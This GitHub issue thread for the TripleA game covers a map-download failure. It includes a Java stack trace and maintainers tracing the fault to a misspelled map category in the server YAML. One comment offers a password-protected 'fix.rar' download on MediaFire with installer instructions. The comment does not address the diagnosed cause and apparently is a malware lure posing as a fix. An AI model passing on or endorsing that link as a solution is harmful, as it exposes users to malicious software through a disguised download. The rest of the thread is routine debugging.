### ISSUE TITLE
Map download not working

### ISSUE THREAD

**Issue by Azredder** [triplea-game/triplea#12866]
Map downloads were working this past weekend (Aug 24, 2024).  Today, not working.  Debug is below.

```
Aug 26, 2024 8:12:02 PM org.triplea.game.client.HeadedGameRunner lambda$initializeClientSettingAndLogging$0
SEVERE: No enum constant games.strategy.engine.framework.map.download.DownloadFileDescription.MapCategory.Experimental
java.lang.IllegalArgumentException: No enum constant games.strategy.engine.framework.map.download.DownloadFileDescription.MapCategory.Experimental
	at java.base/java.lang.Enum.valueOf(Enum.java:240)
	at games.strategy.engine.framework.map.download.DownloadFileParser.optEnum(DownloadFileParser.java:89)
	at games.strategy.engine.framework.map.download.DownloadFileParser.lambda$parseImpl$0(DownloadFileParser.java:66)
	at java.base/java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:183)
	at java.base/java.util.stream.ReferencePipeline$3$1.accept(ReferencePipeline.java:195)
	at java.base/java.util.ArrayList$ArrayListSpliterator.forEachRemaining(ArrayList.java:1654)
	at java.base/java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:484)
	at java.base/java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:474)
	at java.base/java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:150)
	at java.base/java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:173)
	at java.base/java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
	at java.base/java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:497)
	at games.strategy.engine.framework.map.download.DownloadFileParser.parseImpl(DownloadFileParser.java:49)
	at games.strategy.engine.framework.map.download.DownloadFileParser.parse(DownloadFileParser.java:36)
	at games.strategy.engine.framework.map.download.ContentReader.downloadAndApplyAction(ContentReader.java:51)
	at games.strategy.engine.framework.map.download.ContentReader.download(ContentReader.java:39)
	at games.strategy.engine.framework.map.download.DownloadRunnable.download(DownloadRunnable.java:26)
	at games.strategy.engine.framework.map.listing.MapListingFetcher.lambda$getMapDownloadList$1(MapListingFetcher.java:39)
	at java.base/java.util.Optional.orElseGet(Optional.java:369)
	at games.strategy.engine.framework.map.listing.MapListingFetcher.getMapDownloadList(MapListingFetcher.java:39)
	at games.strategy.engine.framework.ui.background.BackgroundTaskRunner$1.doInBackground(BackgroundTaskRunner.java:108)
	at java.desktop/javax.swing.SwingWorker$1.call(SwingWorker.java:304)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.desktop/javax.swing.SwingWorker.run(SwingWorker.java:343)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
	at java.base/java.lang.Thread.run(Thread.java:834)
```

**Comment by Azredder** [comment]
TripleA version 2.5.22294

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by TheDog-GH** [comment]
Also posted here
https://forums.triplea-game.org/topic/3864/2-7-release-testing-megathread/10

**Comment by beelee1** [comment]
this is the same as #12859 Will leave them both open for now.  I wonder if 14862 is when it changed ? https://github.com/triplea-game/triplea/releases/tag/2.7.14862

Maybe revert to 14861 for now ? @frigoref thoughts

@Cernelius should a temporary link be added to lobby taking people to the maps at git ? They can dl direct. Would need instructions too

**Comment by TheDog-GH** [comment]
2.5 is also broke, so its the map server

**Comment by beelee1** [comment]
Will ping @RoiEXLab then. Idk if he can help or not as i don't think the lobby is his area of expertise but dan said he could restart bots anyway :)

I made a couple posts explaining how to dl directly from git for the site and the A&A one. Maybe someone can add that link to the lobby welcome message. https://www.axisandallies.org/forums/topic/41126/how-to-dl-triplea-maps-directly-from-github

**Comment by beelee1** [comment]
yay Roi :)

yes I can dl maps in 2.7, cant test 2.5 but i'm guessing so :)

**Comment by beelee1** [comment]
@RoiEXLab sorry to bug again but should there be some sort of check added for the spelling for the yaml updates so this doesn't happen again ? It was all green when I merged it and the yamls are the only ones I do. Was kind of a mini catastrophe :)

**Comment by RoiEXLab** [comment]
@beelee1 Nono you have a point, there should be a check to prevent these kinds of failures
